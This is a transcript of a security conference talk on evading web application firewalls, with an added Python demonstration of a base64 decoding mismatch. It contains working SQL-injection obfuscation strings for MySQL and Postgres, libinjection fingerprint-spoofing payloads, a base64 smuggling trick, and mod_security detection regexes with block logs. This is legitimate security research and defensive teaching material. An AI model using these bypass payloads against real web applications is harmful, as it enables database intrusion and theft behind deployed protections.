
Lie to Me: Bypassing Modern Web Application Firewalls


The talk analyses modern Web Application Firewalls. The author compares attack detection algorithms and discusses their advantages and disadvantages. The talk includes examples of bypassing protection mechanisms. The author points out the need for a universal method of masquerading attack vectors of various kinds so that they pass WAFs built on different detection algorithms.


  1. Bypassing modern web application firewalls
     @ONsec_lab, http://lab.onsec.ru
  2. About
     • Security audits of web apps since 2009
     • @d0znpp twitter
     • @ONsec_lab twitter
     • Nice blog! http://lab.onsec.ru - [ENG]
     • d0znpp[at]ONsec[dot]ru email
  3. WTF WAF?
     • Web Application Firewall
     • Prevent attacks
     • Attack != Vulnerability
     • Risk != Attack
  4. Software vs Hardware
     • Different HTTP parsers
     • Many «hardware» WAFs use Apache, Lighttpd or Nginx forks
  5. Implementation
     • Failover bypass: DoS/DDoS the WAF to bypass it - why not?!
     • What happens with traffic when your filter is overloaded?
     • XML, regexp and token bombs for this
     • Not so silent, right? :)
  6. WAF work stages
     • Parse the HTTP packet from the client (the web server does this in the general case)
     • Determine the rules that must be applied to the current URL/client/hostname/etc
     • Normalize data (2nd urldecode, base64, etc)
     • Do detection logic (such as regexp)
     • Make the detection decision (true/false/score)
  7. WAF work stages (the same list as slide 6)
  8. Protocol level bug looks like abyss
  9. Parse HTTP packets
     • First read: «Protocol-Level Evasion of Web Application Firewalls», Ivan Ristic, BH-US-2012
     • Nice bypass of Imperva yesterday by @webpentest during the PHDays WAF bypass contest: Content-Type: invalid :)))
     • Classic example - HTTP Parameter Pollution
     • Are you sure that the WAF's and the web app's HTTP protocols are the same?
  10. WAF work stages (the same list as slide 6)
  11. Data normalization level bug looks like tunnel
  12. Data normalization
     • Format parsers, for example: base64, xml, JSON
     • Are you sure that the WAF's and the web app's parsers are the same?
  13. Data normalization
     • mod_security, t:base64Decode: decodes the string until the first = char
     • PHP, base64_decode($strict=false): decodes the whole string
     • Attack vector: YWFh=attackhere
     • Use t:base64DecodeExt!
  14. Data normalization
     • Yet another example from yesterday's PHDays WAF bypass contest - Imperva XML decoding
     • First decode the XML, then validate it for attacks
     • The XML input was not set up as XML type in the WAF
     • Put the attack as XML-encoded data (entities) to bypass the regexp: union select 123
  15. WAF work stages (the same list as slide 6)
  16. Detection logic bug looks like ninja
  17. Detection logic
     • Regular expressions (mod_security, etc)
     • Tokenizers (libinjection)
     • ...
  18. SQL syntax
     • First read these works:
       http://websec.wordpress.com/tag/sql-obfuscation/
       http://www.slideshare.net/nickgsuperstar/new-techniques-in-sql-obfuscation
     • An obfuscated vector is more than welcome!
     • Try to exploit
  19. SQL syntax - time to fuzz!
     • SELECT{$P1} 1 FROM...
     • ...UNION{$P2}FROM...
     • SELECT VERSION{$P3}()
     • SELECT{$P4}VERSION{$P4}()
     • SELECT 1{$P5}BAD
  20. MySQL: the classics
     • SELECT{U} 1 FROM
     • ...UNION{U}FROM...
     • SELECT VERSION{U}()
     • {U} = [0x09,0x0A-0x0D,0x20,0xA0]*
     • Fuzzed only 1-byte sequences, not /**/, etc
  21. MySQL: time to fuzz!
     • SELECT{F}VERSION{F}()
     • SELECT 1{D}BAD
     • {F} = {U} + 0x60 (backquote `)
     • {D} = # + 0x60
     • Have fun with regexp:
     • select`version` ( )
     • ... where id='1'`' and ... - commented now
  22. MySQL: break tokens!
     • SELECT{O}1 FROM test
     • {O} = [-+!~@]
     • SELECT 1{W}FROM test;
     • {W} = [.d?|ed]
     • Part of this was discovered during our WAF bypass contest last year by @Black2Fan
  23. MySQL: break tokens!
     • SELECT-1e1FROM test
     • SELECT~1.FROM test
     • SELECTNFROM test
     • SELECT@^1.FROM test
     • SELECT-id-1.FROM test
     • all tested on MySQL 5.1.66-0-squeeze1
  24. Postgres: the classics
     • SELECT{U} 1 FROM
     • ...UNION{U}FROM...
     • SELECT VERSION{U}()
     • {U} = [0x09,0x0A,0x0C,0x0D,0x20]*
     • Fuzzed only 1-byte sequences, not /**/, etc
  25. Postgres: time to fuzz!
     • SELECT{F}VERSION{F}()
     • SELECT 1{D}BAD
     • {F} = {U} + 0x22 (double quote ")
     • {D} = # + 0x22
     • Have fun with regexp:
     • select"version" ( )
     • ... where id='1'`' and ... - commented now
  26. Postgres: break tokens!
     • SELECT{O}1 FROM test
     • {O} = [.-+!~@] - @ is the absolute value operator
     • SELECT 1{W}FROM test;
     • {W} = [.d?|ed|] - nothing is also OK!
  27. Postgres: break tokens!
     • SELECT-1FROM test
     • SELECT.1FROM test
     • SELECT~1FROM test
     • SELECT-id-1FROM test
     • all tested on PostgreSQL 9.2.4
  28. Time to exploit!
     • mod_security
     • libinjection
     • others?
  29. mod_security
     • CRS (https://github.com/SpiderLabs/owasp-modsecurity-crs)
     • base_rules
     • many regular expressions
  30. mod_security
     • ?id=select id from test
     • ?id=select-id-1.from test
     Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\s*?(?:all|distinct|[(!@]*?)?\s*?[([]*?\s*?select\s+)|(?:\w+\s+like\s+["`\xc2\xb4\xe2\x80\x99\xe2\x80\x98])|(?:like\s*?["`\xc2\xb4\xe2\x80\x99\xe2\x80\x98]%)|(?:["`\xc2\xb4\xe2\x80\x99\xe2\x80\x98]\s*?like\W*?["`\xc2\xb4 ..." at ARGS:id. [file "/opt/modsecurity/rules/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: select id from found within ARGS:id: select id from test"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"]
  31. mod_security
     • ?id=1 or 1=1 or
     • ?id=1 or true or
     Message: Access denied with code 403 (phase 2). Pattern match "(?i:([\s"`\xc2\xb4\xe2\x80\x99\xe2\x80\x98()]*?)([\d\w]++)([\s"`\xc2\xb4\xe2\x80\x99\xe2\x80\x98()]*?)(?:(?:=|<=>|r?like|sounds\s+like|regexp)([\s"`\xc2\xb4\xe2\x80\x99\xe2\x80\x98()]*?)\2|(?:!=|<=|>=|<>|<|>|\^|is\s+not|not ..." at ARGS:id. [file "/opt/modsecurity/rules/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1=1 found within ARGS:id: 1 or 1=1 or "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]
  32. libinjection
     • Token based detection
     • No more regexp!
     • Fingerprint for each attack: a sequence of 1-5 tokens
     • 14 token types, 14^5+14^4+14^3+14^2+14 ~= 580k possible fingerprints
     • Is it enough to block all SQLi?
  33. libinjection
     • Byte obfuscation doesn't work any more
     • But...
     • What happens if you missed some tokens?
  34. Attack #1. Missed token / fingerprint
     • As fuzzed above, the ` 0x60 byte can be used as a comment in MySQL and also as function quotes
     • into outfile asd -- : block - skksc
     • into outfile asd ` : bypass - skksn
  35. Attack #2. Token obfuscation
     • Find any unblocked fingerprint
     • Obfuscate your attack to produce the same fingerprint
     • A fingerprint has only 5 tokens
     • Need to exploit the anti-obfuscation logic (1+1 and other hardcoded token combinations)
  36. Attack #2. Token obfuscation
     • Fingerprint «v1111» looks safe
     • @a1a2a3a4 - a variable, but the fingerprint of this string is «v», no numeric token here
     • @ф1й2у3ц4 - is a valid variable for MySQL, but produces fingerprint «v1111»
     • @ф1й2у3ц4 union select ... produces fingerprint «v1111» also :)
  37. Some stats
     • Hacking WAFs since 2009
     • About 50 different implementations
     • About 10 different engines
     • Time to hack: min 3 min, max 19 hours, average 1 hour
  38. Questions?
     • @d0znpp twitter
     • @ONsec_lab twitter
     • Nice blog! http://lab.onsec.ru - [ENG]
     • d0znpp[at]ONsec[dot]ru email
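The normalization mismatch from slide 13, as an added example that is not part of the talk: a decoder modelled on mod_security's t:base64Decode (stop at the first "=") beside a lenient decoder modelled on PHP's base64_decode($s, false) and on t:base64DecodeExt, with a deliberately simple detection regexp run over each result. The payload and the regexp are constructed for the demo; the decoders are simplified models, not the engines' own code.

```python
import base64
import re

# Constructed sample: base64("aaa"), a stray "=", then base64 of a SQL tautology.
# A decoder that stops at the first "=" sees only "aaa"; a lenient decoder skips
# the "=" and keeps going, so WAF and backend inspect different plaintexts.
PAYLOAD = "YWFh=" + base64.b64encode(b"' or 1=1").decode()   # YWFh=JyBvciAxPTE=

B64_ALPHABET = frozenset(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/")

# Stand-in for the CRS rules: far simpler than the real rule set, demo only.
SQLI_RE = re.compile(r"(?i)\bor\s+\d+\s*=\s*\d+|\bunion\s+select\b")


def _decode_groups(chars: str) -> bytes:
    """Decode a run of alphabet characters, tolerating a missing final pad."""
    if len(chars) % 4 == 1:        # a lone sextet carries no whole byte; drop it
        chars = chars[:-1]
    return base64.b64decode(chars + "=" * (-len(chars) % 4))


def decode_until_first_pad(s: str) -> bytes:
    """Model of mod_security t:base64Decode: everything after the first '=' is ignored."""
    head = s.split("=", 1)[0]
    return _decode_groups("".join(c for c in head if c in B64_ALPHABET))


def decode_lenient(s: str) -> bytes:
    """Model of PHP base64_decode($s, strict=false) and of t:base64DecodeExt:
    every character outside the alphabet, a misplaced '=' included, is skipped."""
    return _decode_groups("".join(c for c in s if c in B64_ALPHABET))


def waf_blocks(raw: str, normalizer) -> bool:
    """Normalize the parameter with the given decoder, then run the detection regexp."""
    decoded = normalizer(raw).decode("latin-1")
    return SQLI_RE.search(decoded) is not None


if __name__ == "__main__":
    print("WAF with t:base64Decode sees:  ", decode_until_first_pad(PAYLOAD))
    print("PHP backend sees:              ", decode_lenient(PAYLOAD))
    print("blocked with t:base64Decode:   ", waf_blocks(PAYLOAD, decode_until_first_pad))
    print("blocked with t:base64DecodeExt:", waf_blocks(PAYLOAD, decode_lenient))
```

The fix the slide recommends is exactly the second normalizer: the WAF must decode the way the backend does, otherwise the detection logic never sees the bytes the application executes.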
